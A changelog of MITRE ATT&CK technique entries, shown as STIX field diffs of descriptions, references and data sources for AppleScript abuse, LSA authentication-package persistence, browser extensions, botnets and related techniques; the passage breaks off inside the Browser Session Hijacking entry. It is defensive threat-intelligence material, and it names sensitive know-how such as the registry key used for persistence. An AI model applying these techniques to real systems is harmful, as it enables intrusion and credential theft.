descriptionAdversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript) AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility. Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript) AppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility. Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)
external_references[2]['source_name']SentinelOne AppleScriptSentinelOne macOS Red Team
external_references[2]['description']Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.
external_references[2]['url']https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
external_references[3]['source_name']SentinelOne macOS Red TeamSentinelOne AppleScript
external_references[3]['description']Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.
external_references[3]['url']https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
x_mitre_data_sources[0]Command: Command ExecutionProcess: OS API Execution
x_mitre_data_sources[2]Process: OS API ExecutionCommand: Command Execution

[T1560] Archive Collected Data

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 16:36:55.831000+00:002022-01-04 18:44:10.398000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesScript: Script Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesScript: Script Execution

[T1547.002] Boot or Logon Autostart Execution: Authentication Package

Current version: 1.0


Old Description
New Description
t1Adversaries may abuse authentication packages to execute DLLt1Adversaries may abuse authentication packages to execute DLL
>s when the system boots. Windows authentication package DLLs>s when the system boots. Windows authentication package DLLs
> are loaded by the Local Security Authority (LSA) process at> are loaded by the Local Security Authority (LSA) process at
> system start. They provide support for multiple logon proce> system start. They provide support for multiple logon proce
>sses and multiple security protocols to the operating system>sses and multiple security protocols to the operating system
>. (Citation: MSDN Authentication Packages)  Adversaries can >.(Citation: MSDN Authentication Packages)  Adversaries can u
>use the autostart mechanism provided by LSA authentication p>se the autostart mechanism provided by LSA authentication pa
>ackages for persistence by placing a reference to a binary i>ckages for persistence by placing a reference to a binary in
>n the Windows Registry location <code>HKLM\SYSTEM\CurrentCon> the Windows Registry location <code>HKLM\SYSTEM\CurrentCont
>trolSet\Control\Lsa\</code> with the key value of <code>"Aut>rolSet\Control\Lsa\</code> with the key value of <code>"Auth
>hentication Packages"=&lt;target binary&gt;</code>. The bina>entication Packages"=&lt;target binary&gt;</code>. The binar
>ry will then be executed by the system when the authenticati>y will then be executed by the system when the authenticatio
>on packages are loaded.>n packages are loaded.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 15:11:25.821000+00:002022-04-20 16:29:36.291000+00:00
descriptionAdversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages) Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.
external_references[1]['source_name']MSDN Authentication PackagesGraeber 2014
external_references[1]['description']Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.
external_references[1]['url']https://msdn.microsoft.com/library/windows/desktop/aa374733.aspxhttp://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
external_references[2]['source_name']Graeber 2014Microsoft Configure LSA
external_references[2]['description']Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.
external_references[2]['url']http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.htmlhttps://technet.microsoft.com/en-us/library/dn408187.aspx
external_references[3]['source_name']Microsoft Configure LSAMSDN Authentication Packages
external_references[3]['description']Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.
external_references[3]['url']https://technet.microsoft.com/en-us/library/dn408187.aspxhttps://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

[T1020] Automated Exfiltration

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
values_changed
STIX FieldOld valueNew Value
modified2021-08-16 15:23:38.940000+00:002022-04-19 22:50:14.956000+00:00
x_mitre_data_sources[1]Script: Script ExecutionFile: File Access
x_mitre_data_sources[2]Network Traffic: Network Connection CreationScript: Script Execution
x_mitre_data_sources[4]Network Traffic: Network Traffic ContentNetwork Traffic: Network Connection Creation
x_mitre_data_sources[5]File: File AccessNetwork Traffic: Network Traffic Content

[T1547] Boot or Logon Autostart Execution

Current version: 1.1


Old Description
New Description
t1Adversaries may configure system settings to automatically et1Adversaries may configure system settings to automatically e
>xecute a program during system boot or logon to maintain per>xecute a program during system boot or logon to maintain per
>sistence or gain higher-level privileges on compromised syst>sistence or gain higher-level privileges on compromised syst
>ems. Operating systems may have mechanisms for automatically>ems. Operating systems may have mechanisms for automatically
> running a program on system boot or account logon.(Citation> running a program on system boot or account logon.(Citation
>: Microsoft Run Key)(Citation: MSDN Authentication Packages)>: Microsoft Run Key)(Citation: MSDN Authentication Packages)
>(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Per>(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Per
>sistence Sept 2013)(Citation: Linux Kernel Programming)  The>sistence Sept 2013)(Citation: Linux Kernel Programming) Thes
>se mechanisms may include automatically executing programs t>e mechanisms may include automatically executing programs th
>hat are placed in specially designated directories or are re>at are placed in specially designated directories or are ref
>ferenced by repositories that store configuration informatio>erenced by repositories that store configuration information
>n, such as the Windows Registry. An adversary may achieve th>, such as the Windows Registry. An adversary may achieve the
>e same goal by modifying or extending features of the kernel> same goal by modifying or extending features of the kernel.
>.  Since some boot or logon autostart programs run with high>  Since some boot or logon autostart programs run with highe
>er privileges, an adversary may leverage these to elevate pr>r privileges, an adversary may leverage these to elevate pri
>ivileges.>vileges.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesLangendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.
external_referencesCAPEC-564
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-564
external_referencesRussinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
values_changed
STIX FieldOld valueNew Value
modified2021-10-19 04:03:47.056000+00:002022-04-18 22:21:27.840000+00:00
descriptionAdversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
external_references[1]['source_name']capecCylance Reg Persistence Sept 2013
external_references[1]['url']https://capec.mitre.org/data/definitions/564.htmlhttps://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
external_references[2]['source_name']Microsoft Run KeyMSDN Authentication Packages
external_references[2]['description']Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.
external_references[2]['url']http://msdn.microsoft.com/en-us/library/aa376977https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
external_references[3]['source_name']MSDN Authentication PackagesMicrosoft Run Key
external_references[3]['description']Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.
external_references[3]['url']https://msdn.microsoft.com/library/windows/desktop/aa374733.aspxhttp://msdn.microsoft.com/en-us/library/aa376977
external_references[5]['source_name']Cylance Reg Persistence Sept 2013Linux Kernel Programming
external_references[5]['description']Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.
external_references[5]['url']https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-orderhttps://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
external_references[6]['source_name']Linux Kernel ProgrammingTechNet Autoruns
external_references[6]['description']Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
external_references[6]['url']https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdfhttps://technet.microsoft.com/en-us/sysinternals/bb963902
external_references[7]['source_name']TechNet Autorunscapec
external_references[7]['url']https://technet.microsoft.com/en-us/sysinternals/bb963902https://capec.mitre.org/data/definitions/564.html
x_mitre_data_sources[1]Windows Registry: Windows Registry Key CreationCommand: Command Execution
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationProcess: OS API Execution
x_mitre_data_sources[4]Command: Command ExecutionDriver: Driver Load
x_mitre_data_sources[6]Module: Module LoadWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[7]Kernel: Kernel Module LoadModule: Module Load
x_mitre_data_sources[8]Driver: Driver LoadKernel: Kernel Module Load
x_mitre_data_sources[9]Process: OS API ExecutionWindows Registry: Windows Registry Key Creation

[T1037] Boot or Logon Initialization Scripts

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 19:58:02.332000+00:002022-04-01 19:04:02.610000+00:00
x_mitre_data_sources[0]Windows Registry: Windows Registry Key CreationFile: File Modification
x_mitre_data_sources[1]Process: Process CreationWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[2]Command: Command ExecutionFile: File Creation
x_mitre_data_sources[3]Active Directory: Active Directory Object ModificationProcess: Process Creation
x_mitre_data_sources[4]File: File CreationActive Directory: Active Directory Object Modification
x_mitre_data_sources[5]File: File ModificationCommand: Command Execution

[T1584.005] Compromise Infrastructure: Botnet

Current version: 1.0


Old Description
New Description
t1Adversaries may compromise numerous third-party systems to ft1Adversaries may compromise numerous third-party systems to f
>orm a botnet that can be used during targeting. A botnet is >orm a botnet that can be used during targeting. A botnet is 
>a network of compromised systems that can be instructed to p>a network of compromised systems that can be instructed to p
>erform coordinated tasks.(Citation: Norton Botnet) Instead o>erform coordinated tasks.(Citation: Norton Botnet) Instead o
>f purchasing/renting a botnet from a booter/stresser service>f purchasing/renting a botnet from a booter/stresser service
>(Citation: Imperva DDoS for Hire), adversaries may build the>, adversaries may build their own botnet by compromising num
>ir own botnet by compromising numerous third-party systems. >erous third-party systems.(Citation: Imperva DDoS for Hire) 
>Adversaries may also conduct a takeover of an existing botne>Adversaries may also conduct a takeover of an existing botne
>t, such as redirecting bots to adversary-controlled C2 serve>t, such as redirecting bots to adversary-controlled C2 serve
>rs.(Citation: Dell Dridex Oct 2015) With a botnet at their d>rs.(Citation: Dell Dridex Oct 2015) With a botnet at their d
>isposal, adversaries may perform follow-on activity such as >isposal, adversaries may perform follow-on activity such as 
>large-scale [Phishing](https://attack.mitre.org/techniques/T>large-scale [Phishing](https://attack.mitre.org/techniques/T
>1566) or Distributed Denial of Service (DDoS).>1566) or Distributed Denial of Service (DDoS).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:01:00.271000+00:002022-04-19 15:55:58.319000+00:00
descriptionAdversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).
external_references[1]['source_name']Norton BotnetDell Dridex Oct 2015
external_references[1]['description']Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.
external_references[1]['url']https://us.norton.com/internetsecurity-malware-what-is-a-botnet.htmlhttps://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
external_references[3]['source_name']Dell Dridex Oct 2015Norton Botnet
external_references[3]['description']Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.
external_references[3]['url']https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operationhttps://us.norton.com/internetsecurity-malware-what-is-a-botnet.html

[T1176] Browser Extensions

Current version: 1.2


Old Description
New Description
t1Adversaries may abuse Internet browser extensions to establit1Adversaries may abuse Internet browser extensions to establi
>sh persistent access to victim systems. Browser extensions o>sh persistent access to victim systems. Browser extensions o
>r plugins are small programs that can add functionality and >r plugins are small programs that can add functionality and 
>customize aspects of Internet browsers. They can be installe>customize aspects of Internet browsers. They can be installe
>d directly or through a browser's app store and generally ha>d directly or through a browser's app store and generally ha
>ve access and permissions to everything that the browser can>ve access and permissions to everything that the browser can
> access.(Citation: Wikipedia Browser Extension)(Citation: Ch> access.(Citation: Wikipedia Browser Extension)(Citation: Ch
>rome Extensions Definition)  Malicious extensions can be ins>rome Extensions Definition)  Malicious extensions can be ins
>talled into a browser through malicious app store downloads >talled into a browser through malicious app store downloads 
>masquerading as legitimate extensions, through social engine>masquerading as legitimate extensions, through social engine
>ering, or by an adversary that has already compromised a sys>ering, or by an adversary that has already compromised a sys
>tem. Security can be limited on browser app stores so it may>tem. Security can be limited on browser app stores so it may
> not be difficult for malicious extensions to defeat automat> not be difficult for malicious extensions to defeat automat
>ed scanners.(Citation: Malicious Chrome Extension Numbers) D>ed scanners.(Citation: Malicious Chrome Extension Numbers) D
>epending on the browser, adversaries may also manipulate an >epending on the browser, adversaries may also manipulate an 
>extension's update url to install updates from an adversary >extension's update url to install updates from an adversary 
>controlled server or manipulate the mobile configuration fil>controlled server or manipulate the mobile configuration fil
>e to silently install additional extensions.  Previous to ma>e to silently install additional extensions.  Previous to ma
>cOS 11, adversaries could silently install browser extension>cOS 11, adversaries could silently install browser extension
>s via the command line using the <code>profiles</code> tool >s via the command line using the <code>profiles</code> tool 
>to install malicious <code>.mobileconfig</code> files. In ma>to install malicious <code>.mobileconfig</code> files. In ma
>cOS 11+, the use of the <code>profiles</code> tool can no lo>cOS 11+, the use of the <code>profiles</code> tool can no lo
>nger install configuration profiles, however <code>.mobileco>nger install configuration profiles, however <code>.mobileco
>nfig</code> files can be planted and installed with user int>nfig</code> files can be planted and installed with user int
>eraction.(Citation: xorrior chrome extensions macOS)  Once t>eraction.(Citation: xorrior chrome extensions macOS)  Once t
>he extension is installed, it can browse to websites in the >he extension is installed, it can browse to websites in the 
>background,(Citation: Chrome Extension Crypto Miner)(Citatio>background, steal all information that a user enters into a 
>n: ICEBRG Chrome Extensions) steal all information that a us>browser (including credentials), and be used as an installer
>er enters into a browser (including credentials)(Citation: B> for a RAT for persistence.(Citation: Chrome Extension Crypt
>anker Google Chrome Extension Steals Creds)(Citation: Catch >o Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banke
>All Chrome Extension) and be used as an installer for a RAT >r Google Chrome Extension Steals Creds)(Citation: Catch All 
>for persistence.  There have also been instances of botnets >Chrome Extension)  There have also been instances of botnets
>using a persistent backdoor through malicious Chrome extensi> using a persistent backdoor through malicious Chrome extens
>ons.(Citation: Stantinko Botnet) There have also been simila>ions.(Citation: Stantinko Botnet) There have also been simil
>r examples of extensions being used for command & control.(C>ar examples of extensions being used for command & control.(
>itation: Chrome Extension C2 Malware)>Citation: Chrome Extension C2 Malware)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 19:56:54.161000+00:002022-04-20 16:46:36.707000+00:00
descriptionAdversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)
external_references[1]['source_name']Wikipedia Browser ExtensionChrome Extension Crypto Miner
external_references[1]['description']Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.
external_references[1]['url']https://en.wikipedia.org/wiki/Browser_extensionhttps://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/
external_references[2]['source_name']Chrome Extensions Definitionxorrior chrome extensions macOS
external_references[2]['description']Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.
external_references[2]['url']https://developer.chrome.com/extensionshttps://www.xorrior.com/No-Place-Like-Chrome/
external_references[3]['source_name']Malicious Chrome Extension NumbersChrome Extensions Definition
external_references[3]['description']Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.
external_references[3]['url']https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdfhttps://developer.chrome.com/extensions
external_references[4]['source_name']xorrior chrome extensions macOSICEBRG Chrome Extensions
external_references[4]['description']Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.
external_references[4]['url']https://www.xorrior.com/No-Place-Like-Chrome/https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses
external_references[5]['source_name']Chrome Extension Crypto MinerMalicious Chrome Extension Numbers
external_references[5]['description']Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.
external_references[5]['url']https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
external_references[6]['source_name']ICEBRG Chrome ExtensionsChrome Extension C2 Malware
external_references[6]['description']De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017.
external_references[6]['url']https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesseshttps://kjaer.io/extension-malware/
external_references[7]['source_name']Banker Google Chrome Extension Steals CredsCatch All Chrome Extension
external_references[7]['description']Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.
external_references[7]['url']https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)
external_references[8]['source_name']Catch All Chrome ExtensionBanker Google Chrome Extension Steals Creds
external_references[8]['description']Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.
external_references[8]['url']https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/
external_references[10]['source_name']Chrome Extension C2 MalwareWikipedia Browser Extension
external_references[10]['description']Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017.Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.
external_references[10]['url']https://kjaer.io/extension-malware/https://en.wikipedia.org/wiki/Browser_extension
x_mitre_data_sources[0]Command: Command ExecutionFile: File Creation
x_mitre_data_sources[1]Process: Process CreationNetwork Traffic: Network Connection Creation
x_mitre_data_sources[2]Network Traffic: Network Connection CreationCommand: Command Execution
x_mitre_data_sources[4]File: File CreationProcess: Process Creation

[T1185] Browser Session Hijacking

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
